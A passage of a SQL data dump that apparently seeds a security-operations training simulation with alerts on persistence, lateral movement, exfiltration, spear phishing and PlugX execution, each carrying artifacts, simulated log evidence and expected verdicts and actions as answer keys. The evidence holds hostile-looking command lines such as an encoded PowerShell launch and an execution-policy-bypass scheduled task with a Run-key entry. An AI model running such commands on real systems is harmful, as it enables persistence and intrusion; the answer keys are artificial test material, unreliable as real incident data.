activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a7b9c3d4e5f67890123456789abcdef1234567890123456789abcdef12345678\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"File hash associated with Derusbi malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"derusbi.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware 
Database\",\"verdict\":\"malicious\",\"details\":\"Executable linked to Derusbi malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(786, 'Persistence Mechanism Identified', 'high', 'Registry and Scheduled Tasks Monitoring', 'The attackers embed themselves within the network, creating persistent backdoors that allow them to remain undetected while they continue their operations. A scheduled task was discovered on host 192.168.1.15 that executes a malicious script to maintain persistence. Additionally, a suspicious registry key modification was detected.', 'Persistence', 'T1053 - Scheduled Task/Job', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:00Z\",\"host\":\"192.168.1.15\",\"user\":\"compromised_user\",\"task_name\":\"UpdateChecker\",\"task_path\":\"C:\\\\Windows\\\\System32\\\\Tasks\\\\UpdateChecker\",\"task_command\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\scripts\\\\update.ps1\",\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\MaliciousApp\",\"registry_value\":\"C:\\\\malware\\\\malicious.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"attacker_ip\":\"203.0.113.45\"}', '2026-01-11 23:42:29', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known malicious activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Hash identified as a known malware sample.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal 
directory\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.434Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:00Z\\\",\\\"host\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"task_name\\\":\\\"UpdateChecker\\\",\\\"task_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\UpdateChecker\\\",\\\"task_command\\\":\\\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\\\\\scripts\\\\\\\\update.ps1\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\malware\\\\\\\\malicious.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.434Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:00Z\\\",\\\"host\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"task_name\\\":\\\"UpdateChecker\\\",\\\"task_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\UpdateChecker\\\",\\\"task_command\\\":\\\"powershell.exe -ExecutionPolicy Bypass -File 
C:\\\\\\\\scripts\\\\\\\\update.ps1\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\malware\\\\\\\\malicious.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.434Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:00Z\\\",\\\"host\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"task_name\\\":\\\"UpdateChecker\\\",\\\"task_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\UpdateChecker\\\",\\\"task_command\\\":\\\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\\\\\scripts\\\\\\\\update.ps1\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\malware\\\\\\\\malicious.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.434Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:00Z\\\",\\\"host\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"task_name\\\":\\\"UpdateChecker\\\",\\\"task_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\UpdateChecker\\\",\\\"task_command\\\":\\\"powershell.exe -ExecutionPolicy Bypass -File 
C:\\\\\\\\scripts\\\\\\\\update.ps1\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\malware\\\\\\\\malicious.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.434Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:00Z\\\",\\\"host\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"task_name\\\":\\\"UpdateChecker\\\",\\\"task_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\UpdateChecker\\\",\\\"task_command\\\":\\\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\\\\\scripts\\\\\\\\update.ps1\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\malware\\\\\\\\malicious.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(787, 'Lateral Movement Traced', 'high', 'Network Traffic Analysis', 'Deep Panda identified conducting internal reconnaissance to map network and locate critical databases. Movement detected from 10.0.0.45 to 192.168.1.100, targeting database server containing sensitive patient records.', 'Internal Reconnaissance', 'T1046', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:28Z\",\"source_ip\":\"10.0.0.45\",\"destination_ip\":\"192.168.1.100\",\"malicious_ip\":\"203.0.113.5\",\"username\":\"jdoe\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"event\":\"Lateral Movement Detected\",\"protocol\":\"SMB\",\"filename\":\"db_script.ps1\",\"action\":\"Access Attempted\",\"result\":\"Success\"}', '2026-01-11 23:42:29', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of targeted database server.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with Deep Panda.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malware used by Deep Panda.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"db_script.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Script file used during lateral 
movement.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Compromised user account used for lateral movement.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(788, 'Data Exfiltration Detected', 'critical', 'Data Loss Prevention (DLP) Systems', 'Anomalous data transfer detected from internal network to an external IP, indicating the extraction of unencrypted patient data from Anthem\'s database.', 'Data Exfiltration', 'T1020: Automated Exfiltration', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_type\":\"data_exfiltration\",\"source_ip\":\"10.1.2.45\",\"destination_ip\":\"203.0.113.45\",\"user\":\"jdoe\",\"file_name\":\"patient_data_extract.csv\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"transfer_size\":\"15MB\",\"protocol\":\"HTTPS\",\"action\":\"allowed\",\"alert_id\":\"DLP-2023-5678\"}', '2026-01-11 23:42:29', '2026-02-16 18:00:40', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntel\",\"verdict\":\"malicious\",\"details\":\"Known command-and-control server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.2.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Corporate workstation\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"patient_data_extract.csv\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Contains sensitive patient data\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No detection across multiple AV engines\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.436Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.1.2.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"patient_data_extract.csv\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"transfer_size\\\":\\\"15MB\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"alert_id\\\":\\\"DLP-2023-5678\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.436Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.1.2.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"patient_data_extract.csv\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"transfer_size\\\":\\\"15MB\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"alert_id\\\":\\\"DLP-2023-5678\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.436Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.1.2.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"patient_data_extract.csv\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"transfer_size\\\":\\\"15MB\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"alert_id\\\":\\\"DLP-2023-5678\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.436Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.1.2.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"patient_data_extract.csv\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"transfer_size\\\":\\\"15MB\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"alert_id\\\":\\\"DLP-2023-5678\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.436Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.1.2.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"patient_data_extract.csv\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"transfer_size\\\":\\\"15MB\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"alert_id\\\":\\\"DLP-2023-5678\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(789, 'Initial Access via Spear Phishing Campaign', 'high', 'Email security logs', 'APT1 initiated the breach with a targeted spear phishing campaign, sending malicious emails to OPM employees to harvest credentials, enabling them to infiltrate the network.', 'Phishing', 'T1566.001', 1, 'investigating', 74, '{\"timestamp\":\"2023-10-12T14:32:45Z\",\"email_id\":\"3efc57b5-9b4e-4c2e-abc3-7d3b6e2f6f8d\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.1.2.3\",\"recipient\":\"jdoe@opm.gov\",\"sender\":\"compromised@trustedsource.com\",\"subject\":\"Urgent: Action Required\",\"attachment_name\":\"HR_Policy_Update.pdf\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"malicious_url\":\"http://malicious-site.com/login\",\"detected_phishing\":true}', '2026-01-11 23:44:22', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Open Threat Exchange\",\"verdict\":\"malicious\",\"details\":\"IP known for hosting phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware distribution.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-site.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"PhishTank\",\"verdict\":\"malicious\",\"details\":\"URL flagged for phishing.\"}},{\"id\":\"artifact_4\",\"type\":\"email\",\"value\":\"compromised@trustedsource.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"Email address used in multiple phishing campaigns.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"escalate\"]}', 'novice', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.438Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:45Z\\\",\\\"email_id\\\":\\\"3efc57b5-9b4e-4c2e-abc3-7d3b6e2f6f8d\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.1.2.3\\\",\\\"recipient\\\":\\\"jdoe@opm.gov\\\",\\\"sender\\\":\\\"compromised@trustedsource.com\\\",\\\"subject\\\":\\\"Urgent: Action Required\\\",\\\"attachment_name\\\":\\\"HR_Policy_Update.pdf\\\",\\\"attachment_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"malicious_url\\\":\\\"http://malicious-site.com/login\\\",\\\"detected_phishing\\\":true}\"},{\"timestamp\":\"2026-02-01T20:31:22.438Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:45Z\\\",\\\"email_id\\\":\\\"3efc57b5-9b4e-4c2e-abc3-7d3b6e2f6f8d\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.1.2.3\\\",\\\"recipient\\\":\\\"jdoe@opm.gov\\\",\\\"sender\\\":\\\"compromised@trustedsource.com\\\",\\\"subject\\\":\\\"Urgent: Action Required\\\",\\\"attachment_name\\\":\\\"HR_Policy_Update.pdf\\\",\\\"attachment_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"malicious_url\\\":\\\"http://malicious-site.com/login\\\",\\\"detected_phishing\\\":true}\"},{\"timestamp\":\"2026-02-01T20:30:22.438Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:45Z\\\",\\\"email_id\\\":\\\"3efc57b5-9b4e-4c2e-abc3-7d3b6e2f6f8d\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.1.2.3\\\",\\\"recipient\\\":\\\"jdoe@opm.gov\\\",\\\"sender\\\":\\\"compromised@trustedsource.com\\\",\\\"subject\\\":\\\"Urgent: Action Required\\\",\\\"attachment_name\\\":\\\"HR_Policy_Update.pdf\\\",\\\"attachment_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"malicious_url\\\":\\\"http://malicious-site.com/login\\\",\\\"detected_phishing\\\":true}\"},{\"timestamp\":\"2026-02-01T20:29:22.438Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:45Z\\\",\\\"email_id\\\":\\\"3efc57b5-9b4e-4c2e-abc3-7d3b6e2f6f8d\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.1.2.3\\\",\\\"recipient\\\":\\\"jdoe@opm.gov\\\",\\\"sender\\\":\\\"compromised@trustedsource.com\\\",\\\"subject\\\":\\\"Urgent: Action Required\\\",\\\"attachment_name\\\":\\\"HR_Policy_Update.pdf\\\",\\\"attachment_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"malicious_url\\\":\\\"http://malicious-site.com/login\\\",\\\"detected_phishing\\\":true}\"},{\"timestamp\":\"2026-02-01T20:28:22.438Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:45Z\\\",\\\"email_id\\\":\\\"3efc57b5-9b4e-4c2e-abc3-7d3b6e2f6f8d\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.1.2.3\\\",\\\"recipient\\\":\\\"jdoe@opm.gov\\\",\\\"sender\\\":\\\"compromised@trustedsource.com\\\",\\\"subject\\\":\\\"Urgent: Action 
Required\\\",\\\"attachment_name\\\":\\\"HR_Policy_Update.pdf\\\",\\\"attachment_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"malicious_url\\\":\\\"http://malicious-site.com/login\\\",\\\"detected_phishing\\\":true}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(790, 'Execution of PlugX RAT for Network Control', 'high', 'Endpoint detection and response (EDR) logs', 'APT1 has deployed the PlugX RAT to execute commands and manipulate system processes, ensuring continued access and control over the network. The RAT was executed from a suspicious executable found on the endpoint.', 'Malware Execution', 'T1203: Exploitation for Client Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:38Z\",\"event_type\":\"process_creation\",\"hostname\":\"compromised-host\",\"username\":\"john_doe\",\"source_ip\":\"192.168.1.10\",\"destination_ip\":\"203.0.113.45\",\"process_name\":\"plugx.exe\",\"process_id\":5678,\"parent_process_id\":1234,\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"file_path\":\"C:\\\\Users\\\\john_doe\\\\AppData\\\\Local\\\\Temp\\\\plugx.exe\"}', '2026-01-11 23:44:22', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with APT1 operations.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with PlugX RAT executable.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"plugx.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"Executable file related to PlugX RAT.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"john_doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"User 
Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user of the compromised host.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc 